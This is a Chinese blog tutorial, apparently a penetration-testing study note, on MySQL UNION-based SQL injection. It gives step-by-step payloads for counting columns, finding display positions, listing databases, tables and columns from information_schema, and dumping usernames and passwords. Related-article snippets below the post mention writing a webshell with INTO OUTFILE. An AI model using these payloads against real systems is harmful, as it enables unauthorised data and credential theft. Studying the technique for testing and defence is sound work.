MYSQL联合注入

最新推荐文章于 2022-07-31 17:15:58 发布
最新推荐文章于 2022-07-31 17:15:58 发布
阅读量255 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39654116/article/details/112209594
版权

目录

MySQL注入总结

简介

联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截

特定变量

1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。

2\. TABLES 表 : 提供了关于数据库中的表的信息。

3\. COLUMNS 表 :提供了表中的列信息

查询步骤

  1. 先确定字段数量。

    使用order/group by语句。通过往后边拼接数字,可确定字段数量, 若大于,则页面错误/无内容,若小于或等于,则页面正常。若错误页与正常页一样,更换报错注入/盲注

  2. 判断页面回显数据的字段位置。

    使用union select 1,2,3,4,x… 我们定义的数字将显示在页面上,即可从中判断页面显示的字段位置。

    注意:

    • 若确定页面有回显,但是页面中并没有我们定义的特殊标记数字出现,可能是页面现在了单行数据输出,我们让前边的 select查询条件返回结果为空即可

    • 注意一定要拼接够足够的字段数,否则SQL语句报错。PS:此方法也可作为判断前条 select语句的方法之一

    • union作用是连接多条查询语句,我们使用order by测试的字段数,是上一条查询语句中表格的字段数

  3. 在显示的字段位置使用子查询来查询数据,或直接查询也可。

    首先,查询当前数据库名database()、数据库账号user()、数据库版本version()等基本情况,再根据不同的版本、不同的权限确定接下来的方法。

Mysql版本<5.0

简单的说,由于mysql的低版本缺乏系统库 information_schema,故通常情况下,我们无法直接查询表名,字段(列)名等信息,这时候只能靠猜来解决。

直接猜表名与列名是什么,甚至是库名,再使用联合查询取数据。

若知道仅表名而不知道列(字段)名

可通过以下payload:

  • 若多字段:select `x` from(select 1,2,3,4,xxx from table_name union select * from table_name)a

  • 若单字段:select *,1,2,xxx from table_name

Mysql版本>=5.0

通过information_schema的数据库里的 shemata数据表查询全部数据库名。若不需要跨数据库的话,可直接跳过此步骤,直接查询相应的数据库下的全部数据表名。

tables表 //存储着全部的数据表信息
table_name字段 //保存所有数据库表的名字
table_schema字段 //保存其对应的数据库名
columns表 //可查询对应的数据库/数据库表含有的字段名

在这里插入图片描述

union select  1 ,2,group_concat (table_name), 4,xxxx from  information_schema .tables  where table_schema = database();

上述payload可查看全部的数据表名,其中**[[group_concat]]函数将多行数据转成一行数据**。

简单的说,查库名->查表名->查字段名->查数据

注入语句

1. 查询列数

	id=1 order by 3

1. 查看回显位

	id=\-1 union select 1,2,3

1. 查询变量信息

	id=\-1 union select 1,database(),3

1. 语句格式 

	union select 1 ,group\_concat(schema\_name),3 from information\_schema.schemata\-\-

1. 查询限制的其中一个数据库

	 from information\_schema.schemata 查询所有数据库

	SELECT 1,2,table\_name from information\_schema.tables where table\_schema=database() limit 0,1 

1. 查询表名

	SELECT 1,2,group\_concat(table\_name) from information\_schema.tables where table\_schema=database() 

1. 查询列名

	SELECT 1,2,group\_concat(column\_name) from information\_schema.columns where table\_name=’users’ 

1. 查询字段值

	SELECT 1,2,group\_concat(id,username,password) from users
Rocky_x
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入系列篇之union联合注入
d59hao的博客
04-27 696
union注入攻击,通过union或union all连接,将自己写的SQL拼接到原始SQL,从而达到执行任意SQL语句的效果。
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
渗透测试学习笔记(一)注入篇-Union注入攻击
weixin_40138844的博客
10-29 718
Mysql5.0及以上版本,存在一个数据库名 information_schema,里面包含了数据库的库名信息,表名信息,列名信息 information_schema.schemta information_schema.tables. information_schema.columns. table_name 表名 table_schema数据名 column_name列...
联合注入的 一些小心得
微笑的孤狼
12-08 278
一、 1、首先贴一个参考博客https://blog.csdn.net/u012763794/article/details/51207833 2、关于联合注入的很多细节博客已经提及,这里只是说一下所需要的一些步骤 注:以下实验来自bugku ctf的成绩单一题 二、首先判断数据库是字符型或者是数字型。 (1)使用单引号,双引号判断,id=1'或者id=1" (2)数字回显比如...
【SQL注入02】union联合查询注入实例操作
Fighting_hawk的博客
02-18 4026
1. 掌握union联合查询注入的流程; 2. 理解union联合查询的限制条件; 3. 查询语句尽可能减少字符串的使用,可以转为使用SQL内置函数或转为16进制码。
计算机病毒与防护:MYSQL联合查询上.ppt
06-10
单击此处添加标题 * * * * * * * * * * * * 目录页 MYSQL联合查询上 联合查询注入原理-SQL的union查询 SQLUNION 操作符用于合并两个或多个 SELECT 语句的结果集。UNION 内部的 SELECT 语句必须拥有相同数量的列。...
MYSQL高级注入教程
04-03
pczygx PC资源共享 MYSQL 高级注入 教程 渗透教程 第一课 MYSQL基础教学I 第二课 MYSQL基础教学II ...第四课 手工注入-联合查询篇 第五课 手工注入-MYSQL5.0暴库 第六课 手工注入-MYSQL注入高级技巧
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySQL注入导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
计算机病毒与防护:MYSQL联合查询下.ppt
06-10
单击此处添加标题 * * * * * * * * * * 目录页 MYSQL联合查询下 联合查询注入原理-判断数据输出位置 SELECT 语句的特殊用法: 当SELECT关键字后跟随的字段名为数字时,结果集也将是对应的数字,如: 联合查询注入...
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库的数据,客户端将数 据展示在页面,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)所有字段名8、获取字段的数据一、...
mysql 联合查询注入
broing55的博客
01-07 515
一. dvwa sql注入 low mid high Low 1.输入1提交 2.输入1’提交 3.输入1 and 1=1 提交 4. 输入1 and 1=2 提交 源码: 列数:2 爆个数据库: 数据库里的表: 表里的表头: 查user和password: 二.medium级别 使用抓包软件bp抓包 当id=1’ ...
mysql的渗透_渗透测试MySql注入(一)
weixin_39924179的博客
01-18 534
一、SQL注入条件参数用户可控:前端传递给后端的参数内容是用户可以控制的。参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库执行。二、MySQL注入知识点在mysql5.0之后默认存在一个information_schema数据库,该数据库有三个表特别重要,分别为:SCHEMATA表、TABLES表、COLUMNS表。SCHEMATA表SCHEMA_NAME存放该用户创建的所有数据库...
mysql 注入
qq_58970968的博客
07-31 1935
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php;当magic_quotes_gpc=On时,输入数据含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
SQL注入实战————1、MySQL手工注入实战
Fly_鹏程万里
05-06 1万+
无意发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL存在一个参数“MQ==”,从参...
mysql 多表关联插入时,关联表使用主表新建记录的主键
whizkidlxh的专栏
05-08 2625
INSERT INTO `sys_permission`(`permission_id`, `permission_name`) VALUES (null, '名称'); set @id = LAST_INSERT_ID(); INSERT INTO `sys_role_permission`(`id`, `role_id`, `permission`) VALUES (null, 1, @id)...
简单联合union查询注入
vcdy
06-02 9174
联合查询有前提  必须有显示位 用sql-labs来学习这是第一个http://127.0.0.1/sqli-labs/Less-1/?id=1一、判断是否用'做字符串引号http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+正常输出出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()二、判断它所在的数据库有几列http://127.0....
sqli手册,学习sql注入必备
最新发布
07-26
作者通过sqlilabs的各种关卡来阐述MySQL注入技术,内容涵盖盲注、导入导出、HTTP头部、服务器架构、宽字节注入等。" SQL注入(SQL Injection,简称SQLi)是一种针对使用不安全的SQL代码构建的网站或应用的攻击方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值